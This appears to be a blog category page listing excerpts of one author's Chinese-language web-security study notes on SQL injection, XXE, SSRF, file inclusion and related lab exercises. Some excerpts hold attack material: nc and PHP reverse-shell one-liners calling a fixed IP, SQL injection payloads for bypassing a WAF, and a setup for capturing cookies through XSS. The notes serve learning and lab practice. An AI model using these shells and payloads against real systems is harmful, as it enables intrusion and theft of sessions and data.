
web安全
文章平均质量分 74
LuckyCharm~
这个作者很懒,什么都没留下…
展开
-
五号黯区靶场 mysql 注入之limit注入记录
mysql注入-limit注入原创 2022-07-21 11:31:16 · 1065 阅读 · 1 评论 -
burpsuite插件自动识别图片验证码暴力破解
burpsuite插件自动识别验证码暴力破解1 准备工具2 工具配置2.1 burp导入captcha-killer-modified-0.14.jar2.1.1 先生成jar包2.1.2 再将jar包导入burp2.2 kali配置识别接口2.2.1 安装依赖2.2.2 启动识别接口3 pikachu靶场测试3.1 抓验证码刷新包3.1.1 开启burp 代理 抓包3.1.2 发送到插件中3.1.3 点击获取 可以看到能获取到验证码3.2 识别验证码3.2.1 访问识别接口3.2.2 修改请求包内容3.原创 2022-04-07 15:31:52 · 8026 阅读 · 4 评论 -
xxe 漏洞学习总结
XXE 学习基础学习如何构建外部实体一:直接通过DTD外部实体声明二:(一般实体)通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明三:(参数实体)通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明。有回显适用于 无回显支持的协议靶场练习 docker XXE靶场搭建漏洞挖掘靶场练习 pikachu(win10)靶场搭建漏洞挖掘无回显情况基础学习XXE(XML External Entity Injection)被称为xml外部实体注入,漏洞发生在应用程序解析用户提交的xml文件时,原创 2021-12-07 19:39:42 · 1182 阅读 · 0 评论 -
反弹shell
搭建http服务python2 搭建http服务python -m SimpleHTTPServer 8080python3 搭建http服务python -m http.server 8080反弹shellnc -e /bin/bash -d 192.168.157.137 8080php -r ‘$sock=fsockopen(“192.168.157.137”,8080);exec("/bin/sh -i <&3 >&3 2>&3");’解决s原创 2021-12-05 01:26:48 · 1380 阅读 · 0 评论 -
sql注入过waf
sql注入过waf安全狗3.51.内联注释+5五位数+%23+%0a 绕过?id=1 union select 1,2,3; 会被拦截经过测验 union select 函数被拦截构造 /*!06447%23%0a*/select 即可绕过安全狗4.0?id=1 union select 1,2,3; 会被拦截3.5版本绕过方法 失败payload union /*!--+/*%0a select /*!1,2,*/3分析 union /*! --+/*%0a原创 2021-10-13 14:35:08 · 3127 阅读 · 0 评论 -
SQL注入学习总结
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结1.sql注入原理web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。2.sql注入的分类根据数据类型分为:数字型、字符型、搜索型。根据提交方式分为:get型 post型 c原创 2021-10-09 05:15:21 · 4811 阅读 · 4 评论 -
MySQL注入中的常用函数
MySQL注入中的常用函数system_user() 系统用户名user() 用户名current_user() 当前用户名session_user() 连接数据库的用户名database() 数据库名version() 数据库版本@@datadir 数据库路径@@basedir 数据库安装路径@@version_compile_os 操作系统count() 返回执行结果数量 select count(*) from users;concat() 没有分隔符的连接字符串 sel原创 2021-10-08 16:16:24 · 1180 阅读 · 0 评论 -
Access偏移注入
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档Acces注入二、便宜注入1.使用场景:2.注入步骤二、便宜注入1.使用场景:1.当我们知道表名,无法得知字段名,查询不出字段内容时。2.引用表字段比union查询表字段多。并且越多越好3.如果2不满足,找该站其他存在注入的页面进行尝试。一个站,要有洞一个都有。2.注入步骤1.判断是否存在注入 and 1=1 and 1=2 2.猜解字段数 test.asp?id=1 order by 103.猜解表名 test.a原创 2021-10-08 02:04:12 · 165 阅读 · 0 评论 -
CDN绕过
CDN绕过前言一、判断cdn是否存在1.直接ping2.超级ping3.nslookup二、CDN绕过1.子域名2.国外ping3.历史DNS解析4.通过ico图标哈希5.利用邮件系统6.通过网站证书7.ssl证书查询8.http数据包查看9.利用app端10.去掉3W11.碰运气12.服务器所在城市ping(不确定)前言参考web渗透实用操作----11招找真实IP - FreeBuf网络安全行业门户https://www.freebuf.com/articles/web/288784.html原创 2021-10-25 21:33:39 · 5181 阅读 · 0 评论 -
google语法
文章目录intext:后台登录 (返回正文包含后台登录的页面)intitle:后台登录 返回标题含有后台登录的页面alltitle:后台登录 管理员 与intitle类似 可以指定多个词inurl:login 将返回url中含有login的页面 inurl:adminloin.php inurl:phpmyadmin/index.phpalinurl:login adminsite:指定访问的站点 eg: site: baidu.com i原创 2021-10-24 23:00:35 · 3224 阅读 · 0 评论 -
SSRF漏洞
SSRF0x00 ssrf介绍0x01 成因0x02 利用1.利用协议1.1file协议读取本地文件1.2php://filter/read(file_get_contents)2.对外网、服务器所在内网、本地进行端口扫描,获取banner信息。3.攻击运行在本地或内网的应用程序。4.对内网wab应用进行指纹识别,识别企业内部资产信息。5.攻击内外网web应用,用http get 请求如(sql,strust2)0x03 漏洞探测1.1 输入url的地方1.2如果是加载图片的地方1.3其他功能点也类似0x0原创 2021-10-21 13:02:40 · 940 阅读 · 0 评论 -
文件包含漏洞
文件包含漏洞文件包含漏洞(属于任意代码执行)0x01背景介绍0x02漏洞成因#常见漏洞代码:触发漏洞的条件:0x03漏洞分类0x04 漏洞危害0x05漏洞利用本地文件包含、1. 包含上传的图片2.1读文件 index.php?file=/etc/passwd2.2读PHP文件 php://filter/read=convert.base64-encode/resource=1.txt2.3包含日志文件Getshell(首先找到日志文件存放位置,让日志文件插入php代码,包含日志文件)远程文件包原创 2021-10-21 01:07:57 · 872 阅读 · 0 评论 -
XSS接收cookie
XSS接收cookie环境1.getcookie.php2.getcookie.js3.存在xss的页面写入4. 攻击尝试5.结果总结环境VPS winserver2012R2 phpstudy apache php靶机 win10 phpstudy apache php pikachuvps放置1.getcookie.php<?php $ip = getenv ('REMOTE_ADDR');$time = date('Y-m-d g原创 2021-10-20 16:45:01 · 749 阅读 · 0 评论 -
web漏洞 总结
小迪WEB一、SQL1.sql注入原理2.sql注入的种类3.SQL注入的绕过 (待补充)sql注入流程判断数据库类型的语句写入webshell的条件如果你在的目录没有执行权限怎么办?(待补充)sql注入的条件into outfile函数作用xp_cmdshell了解过哪些数据库的sql注入,怎么快速判断属于哪个数据库?时间延时的原理?sleep()不能用怎么办http头注入有了解吗?sql注入的防护方法order by 注入了解吗?二、使用步骤1.引入库2.读入数据WEB一、SQL1.sql注入原原创 2021-10-10 03:39:01 · 1144 阅读 · 0 评论